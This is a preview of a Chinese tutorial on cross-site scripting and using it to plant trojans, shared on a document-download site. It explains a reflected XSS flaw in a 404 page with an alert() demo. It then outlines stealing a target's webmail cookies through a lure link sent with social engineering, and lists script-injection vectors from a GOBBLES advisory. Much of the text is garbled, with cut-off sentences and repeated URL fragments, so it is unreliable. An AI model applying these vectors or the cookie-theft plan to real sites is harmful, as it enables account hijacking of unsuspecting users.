简单分析跨站脚本攻击挂马利用

简单分析跨站脚本攻击挂马利用

ID:9724459

大小:63.50 KB

页数:8页

时间:2018-05-06

简单分析跨站脚本攻击挂马利用_第1页
简单分析跨站脚本攻击挂马利用_第2页
简单分析跨站脚本攻击挂马利用_第3页
简单分析跨站脚本攻击挂马利用_第4页
简单分析跨站脚本攻击挂马利用_第5页
资源描述:

《简单分析跨站脚本攻击挂马利用》由会员上传分享,免费在线阅读,更多相关内容在应用文档-天天文库

1、简单分析跨站脚本攻击挂马利用~教育资源库  随着网络应用的普及,跨站脚本攻击漏洞经常在一些安全站点发布,这里笔者将整理一些对XSS跨站挂马的一些看法,错误之处请多指点。  什么是跨站脚本(XSS)?  所谓跨站脚本攻击是指在远程L  JavaScript(本文讨论)  VBScript  ActiveX  Flash  浅析XSS漏洞  许多cgi/php脚本执行时,如果它发现客户提交的请求页面并不存在或有其他类型的错误时,出错信息会通过一个显示错误内容的html页面发送到给访问者。例如:404错误,提示页面不存在。  我们一般对这样的信息不会注意,但是现在要研究CSS漏洞的成

2、因,我们还是仔细看一下。  例:.somesite.tld/cgi-bin/program.cgi?page=dol  该URL指向的连接是有效的,但是如果我们把后面的dol替换成brainrae.html,一个包含404错误信息的页面将反馈给访问者的浏览器。这里我们需要思考,错误信息是如何写入到html文件里呢?  注意:下面仅仅是一个例子,该页面存在XSS漏洞,我们可以插入一些Javascript代码到页面里。  当我们提交这个URL的时候,在我们的浏览器中弹出一个消息框,XSS_Vuln_Testing。  这个例子只是一个XSS漏洞的简单演示,并无实际意义,只用以说明问

3、题所在。  下面我们分析一下造成该运行结果的原因,program.cgi对我们的输入没有经过有效过滤处理,就直接写入404错误页面中,结果创建了一个页面,如下:  <html><b>404</b>-<script>alert(XSS_Vuln_Testing)</script>NotFound!</html>  其中的javascript脚本通过浏览器解释执行,然后就出现了你所看到的结果。  利用XSS  如同前面所提到,如果用户提交的请求不能得到满足,那么服务器端脚本会把输入信息写入一个html文件,当服

4、务器端程序对写入html文件的数据没有进行有效过滤,恶意脚本就可以插入到该html页面中。其他用户浏览该连接的时候脚本将通过客户端浏览器解释执行。  实例:  假设你发现myemailserver.tld有CSS漏洞,你想要获得其中一个人的email帐号,比如我们的目标是A。  已知某存在XSS漏洞的URL.myemailserver.tld/cgi-bin/neyemailserver.tld/cgi-bin/neyemailserver.tld/cgi-bin/neail地址,并了解cookies的作用。那么我们可以给A发送一个恶意连接,来从A机器中的cookie信息里获得

5、有价值的信息。这里我们会利用到一些基本的社会工程欺骗,想办法让A访问myemailserver.tld站点发表的文章,如,亲爱的A,美女图片快来欣赏?  那么当A访问.myemailserver.tld/cgi-bin/neail服务器的登陆页面,挂到其他的系统上,诱使用户登陆恶意系统页面,最终获取对方身份信息。总之,这里需要一些社会工程学欺骗,要耐心。  把javascript脚本插入:GOBBLESSECURITYADVISORY#33 Hereisacut-n-pastecollectionoftypicalJavaScript-injectionhacks youmay

6、derivesomegleefromplayingouseover=[code]>  <imgsrc=javascript:[code]>  &l123下一页友情提醒:,特别!t;imgdynsrc=javascript:[code]>[IE]  <inputtype=imagedynsrc=javascript:[code]>[IE]  <bgsoundsrc=javascript:[code]>[IE]  <script>[code]</script>  {[code]};[N4]  <imgsr

7、c={[code]};>[N4]  <linkrel=stylesheethref=javascript:[code]>  <iframesrc=vbscript:[code]>[IE]  <imgsrc=mocha:[code]>[N4]  <imgsrc=livescript:[code]>[N4]  <ahref=about:<script>[code]</script>>  <metaht

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。